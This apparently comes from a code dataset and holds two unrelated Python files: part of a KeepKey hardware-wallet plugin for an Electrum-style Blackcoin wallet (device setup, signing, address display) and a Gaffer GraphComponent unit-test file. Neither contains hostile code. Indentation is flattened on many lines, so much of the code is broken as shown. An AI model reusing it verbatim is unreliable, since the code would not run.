        except BaseException as e:
            # see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
            # raise
            self.logger.info(f"cannot connect at {device.path} {e}")
            return None
    @runs_in_hwd_thread
    def _try_webusb(self, device):
        """Best-effort WebUSB connection; returns the transport or None."""
        self.logger.info("Trying to connect over WebUSB...")
        try:
            return self.webusb_transport(device)
        except BaseException as e:
            self.logger.info(f"cannot connect at {device.path} {e}")
            return None
    @runs_in_hwd_thread
    def create_client(self, device, handler):
        """Connect to *device*, sanity-check it and return a client, or None.

        Chooses WebUSB vs HID from the product key, pings the device, and
        rejects firmware older than `minimum_firmware`.
        """
        # NOTE(review): product_key[1] == 2 is presumably the WebUSB product
        # id — confirm against keepkeylib DEVICE_IDS.
        if device.product_key[1] == 2:
            transport = self._try_webusb(device)
        else:
            transport = self._try_hid(device)
        if not transport:
            self.logger.info("cannot connect to device")
            return
        self.logger.info(f"connected to device at {device.path}")
        client = self.client_class(transport, handler, self)
        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.logger.info(f"ping failed {e}")
            return None
        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            self.logger.info(msg)
            if handler:
                handler.show_error(msg)
            else:
                raise UserFacingException(msg)
            return None
        return client
    @runs_in_hwd_thread
    def get_client(self, keystore, force_pair=True, *,
                   devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
        """Return the client for *keystore*, marking it as recently used."""
        client = super().get_client(keystore, force_pair,
                                    devices=devices,
                                    allow_user_interaction=allow_user_interaction)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Blackcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
    def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
        """Thread target: run _initialize_device, report errors to the handler,
        and always wake the wizard loop with an exit code (0 = success)."""
        exit_code = 0
        try:
            self._initialize_device(settings, method, device_id, wizard, handler)
        except UserCancelled:
            exit_code = 1
        except BaseException as e:
            self.logger.exception('')
            handler.show_error(repr(e))
            exit_code = 1
        finally:
            wizard.loop.exit(exit_code)
    @runs_in_hwd_thread
    def _initialize_device(self, settings, method, device_id, wizard, handler):
        """Drive the device-side initialization for the chosen TIM_* method.

        *settings* is (item, label, pin_protection, passphrase_protection);
        the meaning of *item* depends on *method* (strength index, word-count
        index, mnemonic string, or xprv).
        """
        item, label, pin_protection, passphrase_protection = settings
        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if not client:
            raise Exception(_("The device was disconnected."))
        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language)
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)
    def _make_node_path(self, xpub, address_n):
        """Convert an xpub plus derivation suffix into a keepkeylib
        HDNodePathType protobuf."""
        bip32node = BIP32Node.from_xkey(xpub)
        node = self.types.HDNodeType(
            depth=bip32node.depth,
            fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
            child_num=int.from_bytes(bip32node.child_number, 'big'),
            chain_code=bip32node.chaincode,
            public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
        )
        return self.types.HDNodePathType(node=node, address_n=address_n)
    def setup_device(self, device_info, wizard, purpose):
        """Pair with the device, initializing it first if needed, and return
        the connected client."""
        device_id = device_info.device.id_
        client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        # Fetch the root xpub off the GUI thread as a connectivity check.
        wizard.run_task_without_blocking_gui(
            task=lambda: client.get_xpub("m", 'standard'))
        client.used()
        return client
    def get_xpub(self, device_id, derivation, xtype, wizard):
        """Return the xpub at *derivation* for the given script type.

        Raises ScriptTypeNotSupported for xtypes outside SUPPORTED_XTYPES.
        """
        if xtype not in self.SUPPORTED_XTYPES:
            raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
        client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
        xpub = client.get_xpub(derivation, xtype)
        client.used()
        return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
    @runs_in_hwd_thread
    def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
        """Have the device sign *tx* and merge the signatures back into it.

        *prev_tx* maps txid hex -> previous transaction, needed for legacy
        inputs.
        """
        # NOTE(review): prev_tx is stashed on the plugin instance, presumably
        # read back by tx_inputs/helpers during sign_tx — not thread-safe if
        # two signings overlap; confirm runs_in_hwd_thread serializes this.
        self.prev_tx = prev_tx
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
        outputs = self.tx_outputs(tx, keystore=keystore)
        signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
                                    lock_time=tx.locktime, version=tx.version)[0]
        # Append SIGHASH_ALL (0x01) byte to each DER signature.
        signatures = [(bh2u(x) + '01') for x in signatures]
        tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
    """Display *address* on the KeepKey screen so the user can verify it.

    Falls back to the wallet's own keystore when none is given; returns
    silently when show_address_helper rejects the request, and shows an
    error instead when the firmware predates address display support.
    """
    if keystore is None:
        keystore = wallet.get_keystore()
    if not self.show_address_helper(wallet, address, keystore):
        return
    client = self.get_client(keystore)
    # address display requires firmware >= 1.3
    if not client.atleast_version(1, 3):
        keystore.handler.show_error(_("Your device firmware is too old"))
        return
    # rebuild the full BIP32 path: keystore derivation prefix + (change, index)
    deriv_suffix = wallet.get_address_index(address)
    derivation = keystore.get_derivation_prefix()
    address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
    address_n = client.expand_path(address_path)
    script_type = self.get_keepkey_input_script_type(wallet.txin_type)
    # prepare multisig, if available:
    xpubs = wallet.get_master_public_keys()
    if len(xpubs) > 1:
        pubkeys = wallet.get_public_keys(address)
        # sort xpubs using the order of pubkeys
        sorted_pairs = sorted(zip(pubkeys, xpubs))
        multisig = self._make_multisig(
            wallet.m,
            [(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
    else:
        multisig = None
    # third positional arg (True) asks the device to render the address on-screen
    client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
    """Convert the inputs of *tx* into a list of KeepKey TxInputType protos.

    for_sig: when True, *tx* must be a PartialTransaction and *keystore*
    must be supplied; script type, multisig info and the BIP32 path of
    our own key are then filled in so the device can sign.  When False
    (serializing a previous transaction), only prevout, script_sig and
    sequence fields are populated.
    """
    inputs = []
    for txin in tx.inputs():
        txinputtype = self.types.TxInputType()
        if txin.is_coinbase_input():
            # coinbase inputs have no real prevout: all-zero hash, max index
            prev_hash = b"\x00"*32
            prev_index = 0xffffffff  # signed int -1
        else:
            if for_sig:
                assert isinstance(tx, PartialTransaction)
                assert isinstance(txin, PartialTxInput)
                assert keystore
                if len(txin.pubkeys) > 1:
                    xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
                    multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
                else:
                    multisig = None
                script_type = self.get_keepkey_input_script_type(txin.script_type)
                # rebuild the proto so script_type/multisig are set in one go
                txinputtype = self.types.TxInputType(
                    script_type=script_type,
                    multisig=multisig)
                # address_n is only filled in when this keystore owns the input
                my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
                if full_path:
                    txinputtype.address_n.extend(full_path)
            prev_hash = txin.prevout.txid
            prev_index = txin.prevout.out_idx
        if txin.value_sats() is not None:
            txinputtype.amount = txin.value_sats()
        txinputtype.prev_hash = prev_hash
        txinputtype.prev_index = prev_index
        if txin.script_sig is not None:
            txinputtype.script_sig = txin.script_sig
        txinputtype.sequence = txin.nsequence
        inputs.append(txinputtype)
    return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
    """Convert the outputs of *tx* into a list of KeepKey TxOutputType protos.

    At most one of our own outputs (preferring the 'change' branch) is
    sent to the device by derivation path, so the device can hide it
    from the user as change; all other outputs are sent as a plain
    address or an OP_RETURN payload.

    NOTE: the nested helpers deliberately close over the loop variables
    `txout` and `address` below.
    """

    def create_output_by_derivation():
        # output owned by this keystore: identify it by BIP32 path (+ multisig)
        script_type = self.get_keepkey_output_script_type(txout.script_type)
        if len(txout.pubkeys) > 1:
            xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
            multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
        else:
            multisig = None
        my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
        assert full_path
        txoutputtype = self.types.TxOutputType(
            multisig=multisig,
            amount=txout.value,
            address_n=full_path,
            script_type=script_type)
        return txoutputtype

    def create_output_by_address():
        # external output: plain address, or OP_RETURN when there is none
        txoutputtype = self.types.TxOutputType()
        txoutputtype.amount = txout.value
        if address:
            txoutputtype.script_type = self.types.PAYTOADDRESS
            txoutputtype.address = address
        else:
            txoutputtype.script_type = self.types.PAYTOOPRETURN
            txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
        return txoutputtype

    outputs = []
    has_change = False
    any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
    for txout in tx.outputs():
        address = txout.address
        use_create_by_derivation = False
        if txout.is_mine and not has_change:
            # prioritise hiding outputs on the 'change' branch from user
            # because no more than one change address allowed
            if txout.is_change == any_output_on_change_branch:
                use_create_by_derivation = True
                has_change = True
        if use_create_by_derivation:
            txoutputtype = create_output_by_derivation()
        else:
            txoutputtype = create_output_by_address()
        outputs.append(txoutputtype)
    return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
    """Convert an electrum Transaction into the device library's
    TransactionType proto, used when feeding previous transactions.

    Returns an empty proto when *tx* is None.
    """
    t = self.types.TransactionType()
    if tx is None:
        # probably for segwit input and we don't need this prev txn
        return t
    tx.deserialize()
    t.version = tx.version
    t.lock_time = tx.locktime
    inputs = self.tx_inputs(tx)
    t.inputs.extend(inputs)
    # prev-tx outputs only need amount + scriptPubKey (bin_outputs form)
    for out in tx.outputs():
        o = t.bin_outputs.add()
        o.amount = out.value
        o.script_pubkey = out.scriptpubkey
    return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
    """Look up a previously-stashed transaction by txid and return it
    converted to the device library's TransactionType proto."""
    return self.electrum_tx_to_txtype(self.prev_tx[tx_hash])
|
GraphComponentTest.py | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import gc
import weakref
import unittest
import threading
import Queue
import IECore
import Gaffer
import GafferTest
class GraphComponentTest( GafferTest.TestCase ) :
def testName( self ) :
c = Gaffer.GraphComponent()
self.assertEqual( c.getName(), "GraphComponent" )
self.assertEqual( c.fullName(), "GraphComponent" )
def f( c ) :
GraphComponentTest.name = c.getName()
con = c.nameChangedSignal().connect( f )
GraphComponentTest.name = "xxx"
c.setName( "newName" )
self.assertEqual( GraphComponentTest.name, "newName" )
# slot shouldn't be called this time, as the name
# doesn't change (it's the same value)
c.setName( "newName" )
self.assertEqual( self.name, "newName" )
self.assertEqual( c.getName(), "newName" )
child1 = Gaffer.GraphComponent()
child2 = Gaffer.GraphComponent()
self.assertEqual( child1.getName(), "GraphComponent" )
self.assertEqual( child2.getName(), "GraphComponent" )
self.assertEqual( child1.fullName(), "GraphComponent" )
self.assertEqual( child2.fullName(), "GraphComponent" )
c.addChild( child1 )
self.assertEqual( child1.getName(), "GraphComponent" )
self.assertEqual( child1.fullName(), "newName.GraphComponent" )
con = child2.nameChangedSignal().connect( f )
GraphComponentTest.name = "xxx"
c.addChild( child2 )
self.assertEqual( child2.getName(), "GraphComponent1" )
self.assertEqual( child2.fullName(), "newName.GraphComponent1" )
self.assertEqual( child2.relativeName( None ), "newName.GraphComponent1" )
self.assertEqual( child2.relativeName( c ), "GraphComponent1" )
self.assertEqual( GraphComponentTest.name, "GraphComponent1" )
def testParenting( self ) :
parent1 = Gaffer.GraphComponent()
self.assert_( parent1.parent() is None )
self.assertEqual( len( parent1.children() ), 0 )
child1 = Gaffer.GraphComponent()
self.assert_( child1.parent() is None )
self.assertEqual( len( child1.children() ), 0 )
parent1.addChild( child1 )
self.assert_( parent1.parent() is None )
self.assert_( parent1.getChild( "GraphComponent" ).isSame( child1 ) )
self.assert_( parent1["GraphComponent"].isSame( child1 ) )
self.assert_( child1.parent().isSame( parent1 ) )
parent1.removeChild( child1 )
self.assertEqual( parent1.children(), () )
self.assertEqual( child1.parent(), None )
self.assertRaises( RuntimeError, parent1.removeChild, child1 )
def testParentingSignals( self ) :
parent = Gaffer.GraphComponent()
child = Gaffer.GraphComponent()
def f( c, oldParent ) :
GraphComponentTest.newParent = c.parent()
GraphComponentTest.oldParent = oldParent
def ff( p, c ) :
GraphComponentTest.parenting = ( p, c )
c1 = child.parentChangedSignal().connect( f )
c2 = parent.childAddedSignal().connect( ff )
GraphComponentTest.newParent = None
GraphComponentTest.oldParent = None
GraphComponentTest.parenting = None
parent.addChild( child )
self.assert_( GraphComponentTest.newParent.isSame( parent ) )
self.assert_( GraphComponentTest.oldParent is None )
self.assert_( GraphComponentTest.parenting[0].isSame( parent ) )
self.assert_( GraphComponentTest.parenting[1].isSame( child ) )
GraphComponentTest.newParent = "xxx"
GraphComponentTest.oldParent = None
GraphComponentTest.parenting = None
c2 = parent.childRemovedSignal().connect( ff )
parent.removeChild( child )
self.assert_( GraphComponentTest.newParent is None )
self.assert_( GraphComponentTest.oldParent.isSame( parent ) )
self.assert_( GraphComponentTest.parenting[0].isSame( parent ) )
self.assert_( GraphComponentTest.parenting[1].isSame( child ) )
def testReparentingEmitsOnlyOneParentChangedSignal( self ) :
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
c = Gaffer.GraphComponent()
def f( child, previousParent ) :
GraphComponentTest.newParent = child.parent()
GraphComponentTest.oldParent = previousParent
GraphComponentTest.child = child
GraphComponentTest.numSignals += 1
GraphComponentTest.newParent = None
GraphComponentTest.oldParent = None
GraphComponentTest.child = None
GraphComponentTest.numSignals = 0
p1["c"] = c
connection = c.parentChangedSignal().connect( f )
p2["c"] = c
self.failUnless( GraphComponentTest.newParent.isSame( p2 ) )
self.failUnless( GraphComponentTest.oldParent.isSame( p1 ) )
self.failUnless( GraphComponentTest.child.isSame( c ) )
self.assertEqual( GraphComponentTest.numSignals, 1 )
def testParentChangedBecauseParentDied( self ) :
parent = Gaffer.GraphComponent()
child = Gaffer.GraphComponent()
parent["child"] = child
def f( child, previousParent ) :
GraphComponentTest.newParent = child.parent()
GraphComponentTest.previousParent = previousParent
c = child.parentChangedSignal().connect( f )
GraphComponentTest.newParent = "XXX"
GraphComponentTest.previousParent = "XXX"
w = weakref.ref( parent )
del parent
while gc.collect() :
pass
IECore.RefCounted.collectGarbage()
self.assertEqual( w(), None )
self.failUnless( GraphComponentTest.newParent is None )
self.failUnless( GraphComponentTest.previousParent is None )
def testReparentingDoesntSignal( self ) :
"""Adding a child to a parent who already owns that child should do nothing."""
parent = Gaffer.GraphComponent()
child = Gaffer.GraphComponent()
parent.addChild( child )
self.assert_( child.parent().isSame( parent ) )
GraphComponentTest.numSignals = 0
def f( a, b=None ) :
GraphComponentTest.numSignals += 1
c1 = child.parentChangedSignal().connect( f )
c2 = parent.childAddedSignal().connect( f )
parent.addChild( child )
self.assertEqual( GraphComponentTest.numSignals, 0 )
def testMany( self ) :

	# Stress test : constructing a very large number of components
	# must succeed without error.
	components = [ Gaffer.GraphComponent() for i in range( 0, 100000 ) ]
def testDictionarySemantics( self ) :
# check setitem and getitem
p = Gaffer.GraphComponent()
c = Gaffer.GraphComponent()
p["c"] = c
self.assert_( p.getChild( "c" ).isSame( c ) )
self.assert_( p["c"].isSame( c ) )
self.assertRaises( KeyError, p.__getitem__, "notAChild" )
# check that setitem removes items with clashing names
c2 = Gaffer.GraphComponent()
p["c"] = c2
self.assert_( p.getChild( "c" ).isSame( c2 ) )
self.assert_( c2.parent().isSame( p ) )
self.assert_( c.parent() is None )
# check delitem
c3 = Gaffer.GraphComponent()
p["c3"] = c3
self.assert_( p.getChild( "c3" ).isSame( c3 ) )
self.assert_( p["c3"].isSame( c3 ) )
self.assert_( "c3" in p )
del p["c3"]
self.assert_( not "c3" in p )
self.assertRaises( KeyError, p.__delitem__, "xxxx" )
def testUniqueNaming( self ) :
p = Gaffer.GraphComponent()
c1 = Gaffer.GraphComponent()
c2 = Gaffer.GraphComponent()
c3 = Gaffer.GraphComponent()
c1.setName( "a" )
c2.setName( "a" )
c3.setName( "a" )
p.addChild( c1 )
self.assertEqual( c1.getName(), "a" )
p.addChild( c2 )
self.assertEqual( c2.getName(), "a1" )
p.addChild( c3 )
self.assertEqual( c3.getName(), "a2" )
c4 = Gaffer.GraphComponent( "a1" )
p.addChild( c4 )
self.assertEqual( c4.getName(), "a3" )
c1.setName( "b" )
c2.setName( "b" )
c3.setName( "b" )
c4.setName( "b" )
self.assertEqual( c1.getName(), "b" )
self.assertEqual( c2.getName(), "b1" )
self.assertEqual( c3.getName(), "b2" )
self.assertEqual( c4.getName(), "b3" )
def testParallelUniqueNaming( self ):
# At one point setName was using a non-threadsafe static formatter which would throw
# exceptions when used from multiple threads
def f( q ) :
try:
g = Gaffer.GraphComponent()
for i in range( 500 ):
g.addChild( Gaffer.GraphComponent( "a" ) )
self.assertEqual( set(g.keys()), set( [ "a" ] + [ "a%i" % i for i in range( 1, 500 ) ] ) )
except Exception as e:
q.put( e )
threads = []
q = Queue.Queue()
for i in range( 0, 500 ) :
t = threading.Thread( target = f, args = (q,) )
t.start()
threads.append( t )
for t in threads :
t.join()
if not q.empty():
raise q.get( False )
def testAncestor( self ) :
a = Gaffer.ApplicationRoot()
s = Gaffer.ScriptNode()
a["scripts"]["one"] = s
n = GafferTest.AddNode()
s["node"] = n
self.assert_( n.ancestor( Gaffer.ScriptNode ).isSame( s ) )
self.assert_( n.ancestor( Gaffer.ApplicationRoot ).isSame( a ) )
def testCommonAncestor( self ) :
a = Gaffer.ApplicationRoot()
s = Gaffer.ScriptNode()
a["scripts"]["one"] = s
s["n1"] = Gaffer.Node()
s["n2"] = Gaffer.Node()
self.assert_( s["n1"].commonAncestor( s["n2"], Gaffer.ScriptNode ).isSame( s ) )
self.assert_( s["n2"].commonAncestor( s["n1"], Gaffer.ScriptNode ).isSame( s ) )
def testCommonAncestorType( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
s["n"]["user"]["p1"] = Gaffer.IntPlug()
s["n"]["user"]["p2"] = Gaffer.Color3fPlug()
self.assertEqual( s["n"]["user"]["p1"].commonAncestor( s["n"]["user"]["p2"]["r"] ), s["n"]["user"] )
self.assertEqual( s["n"]["user"]["p1"].commonAncestor( s["n"]["user"]["p2"]["r"], Gaffer.Plug ), s["n"]["user"] )
self.assertEqual( s["n"]["user"]["p1"].commonAncestor( s["n"]["user"]["p2"]["r"], Gaffer.Node ), s["n"] )
def testRenameThenRemove( self ) :
p = Gaffer.GraphComponent()
c = Gaffer.GraphComponent()
p.addChild( c )
c.setName( "c" )
p.removeChild( c )
def testDescendant( self ) :
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
p3 = Gaffer.GraphComponent()
p1["p2"] = p2
p2["p3"] = p3
self.failUnless( p1.descendant( "p2" ).isSame( p2 ) )
self.failUnless( p1.descendant( "p2.p3" ).isSame( p3 ) )
def testNameConstraints( self ) :
n = Gaffer.GraphComponent()
for name in ( "0", "0a", "@A", "a.A", ".", "A:", "a|", "a(" ) :
self.assertRaises( Exception, n.setName, name )
self.assertRaises( Exception, Gaffer.GraphComponent, name )
for name in ( "hello", "_1", "brdf_0_degree_refl" ) :
n.setName( name )
def testContains( self ) :
n = Gaffer.GraphComponent()
self.failIf( "c" in n )
n["c"] = Gaffer.GraphComponent()
self.failUnless( "c" in n )
def testIsAncestorOf( self ) :
n = Gaffer.GraphComponent()
n["c"] = Gaffer.GraphComponent()
n["c"]["c"] = Gaffer.GraphComponent()
n2 = Gaffer.GraphComponent()
self.failUnless( n.isAncestorOf( n["c"]["c"] ) )
self.failUnless( n.isAncestorOf( n["c"] ) )
self.failIf( n.isAncestorOf( n ) )
self.failIf( n2.isAncestorOf( n ) )
self.failIf( n.isAncestorOf( n2 ) )
def testDerivingInPython( self ) :
class TestGraphComponent( Gaffer.GraphComponent ) :
def __init__( self, name = "TestGraphComponent" ) :
Gaffer.GraphComponent.__init__( self, name )
self.acceptsChildCalled = False
self.acceptsParentCalled = False
def acceptsChild( self, potentialChild ) :
self.acceptsChildCalled = True
return isinstance( potentialChild, TestGraphComponent )
def acceptsParent( self, potentialParent ) :
self.acceptsParentCalled = True
return isinstance( potentialParent, TestGraphComponent )
IECore.registerRunTimeTyped( TestGraphComponent )
# check names in constructors
g1 = TestGraphComponent()
self.assertEqual( g1.getName(), "TestGraphComponent" )
g2 = TestGraphComponent( "g" )
self.assertEqual( g2.getName(), "g" )
# check calling virtual overrides directly
self.assertEqual( g1.acceptsChildCalled, False )
self.assertEqual( g1.acceptsParentCalled, False )
self.assertEqual( g2.acceptsChildCalled, False )
self.assertEqual( g2.acceptsParentCalled, False )
self.failUnless( g1.acceptsChild( g2 ) )
self.failUnless( g1.acceptsParent( g2 ) )
self.failIf( g1.acceptsChild( Gaffer.Node() ) )
self.failIf( g1.acceptsParent( Gaffer.Node() ) )
self.assertEqual( g1.acceptsChildCalled, True )
self.assertEqual( g1.acceptsParentCalled, True )
self.assertEqual( g2.acceptsChildCalled, False )
self.assertEqual( g2.acceptsParentCalled, False )
# check calling virtual overrides indirectly through C++
g1 = TestGraphComponent()
g2 = TestGraphComponent( "g" )
self.assertEqual( g1.acceptsChildCalled, False )
self.assertEqual( g1.acceptsParentCalled, False )
self.assertRaises( RuntimeError, g1.addChild, Gaffer.Node() )
self.assertEqual( g1.acceptsChildCalled, True )
self.assertEqual( g1.acceptsParentCalled, False )
self.assertRaises( RuntimeError, Gaffer.GraphComponent().addChild, g1 )
self.assertEqual( g1.acceptsChildCalled, True )
self.assertEqual( g1.acceptsParentCalled, True )
def testLen( self ) :

	# len() reports the number of children and tracks add/remove.
	g = Gaffer.GraphComponent()
	for expected, name in enumerate( [ "a", "b" ] ) :
		self.assertEqual( len( g ), expected )
		g[name] = Gaffer.GraphComponent()
	self.assertEqual( len( g ), 2 )
	del g["a"]
	self.assertEqual( len( g ), 1 )
def testSetChild( self ) :
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
c1 = Gaffer.GraphComponent()
c2 = Gaffer.GraphComponent()
self.assertEqual( len( p1 ), 0 )
self.assertEqual( len( p2 ), 0 )
self.assertEqual( c1.parent(), None )
self.assertEqual( c2.parent(), None )
p1.setChild( "a", c1 )
self.assertEqual( c1.getName(), "a" )
self.assertEqual( c1.parent(), p1 )
self.assertEqual( len( p1 ), 1 )
p1.setChild( "a", c2 )
self.assertEqual( c1.getName(), "a" )
self.assertEqual( c2.getName(), "a" )
self.assertEqual( c1.parent(), None )
self.assertEqual( c2.parent(), p1 )
self.assertEqual( len( p1 ), 1 )
p2.setChild( "b", c2 )
self.assertEqual( c2.getName(), "b" )
self.assertEqual( c2.parent(), p2 )
self.assertEqual( len( p1 ), 0 )
self.assertEqual( len( p2 ), 1 )
def testSetChildAgain( self ) :
# Setting a child to the same thing should
# cause nothing to happen and no signals to
# be triggered.
parent = Gaffer.GraphComponent()
child = Gaffer.GraphComponent()
parent.setChild( "c", child )
self.assert_( child.parent().isSame( parent ) )
GraphComponentTest.numSignals = 0
def f( *args ) :
GraphComponentTest.numSignals += 1
c1 = child.parentChangedSignal().connect( f )
c2 = parent.childAddedSignal().connect( f )
c3 = parent.childRemovedSignal().connect( f )
c4 = child.nameChangedSignal().connect( f )
parent.setChild( "c", child )
self.assertEqual( GraphComponentTest.numSignals, 0 )
def testEmptyName( self ) :

	# Setting an empty name is rejected outright.
	component = Gaffer.GraphComponent()
	self.assertRaises( RuntimeError, component.setName, "" )
def testGetChildWithEmptyName( self ) :
g = Gaffer.GraphComponent()
self.assertEqual( g.getChild( "" ), None )
self.assertRaises( KeyError, g.__getitem__, "" )
def testKeysAndValuesAndItems( self ) :
g = Gaffer.GraphComponent()
self.assertEqual( g.keys(), [] )
self.assertEqual( g.values(), [] )
g["a"] = Gaffer.GraphComponent()
g["b"] = Gaffer.GraphComponent()
g["c"] = Gaffer.GraphComponent()
self.assertEqual( g.keys(), [ "a", "b", "c" ] )
self.assertEqual( len( g.values() ), 3 )
self.assertEqual( g.values()[0].getName(), "a" )
self.assertEqual( g.values()[1].getName(), "b" )
self.assertEqual( g.values()[2].getName(), "c" )
items = g.items()
self.assertEqual( len( items ), 3 )
self.assertEqual( items[0][0], "a" )
self.assertEqual( items[1][0], "b" )
self.assertEqual( items[2][0], "c" )
self.assertEqual( items[0][1].getName(), "a" )
self.assertEqual( items[1][1].getName(), "b" )
self.assertEqual( items[2][1].getName(), "c" )
def testIndexByIndex( self ) :
g = Gaffer.GraphComponent()
g["a"] = Gaffer.GraphComponent()
g["b"] = Gaffer.GraphComponent()
g["c"] = Gaffer.GraphComponent()
self.assertEqual( len( g ), 3 )
self.assertRaises( IndexError, g.__getitem__, 3 )
self.assertRaises( IndexError, g.__getitem__, -4 )
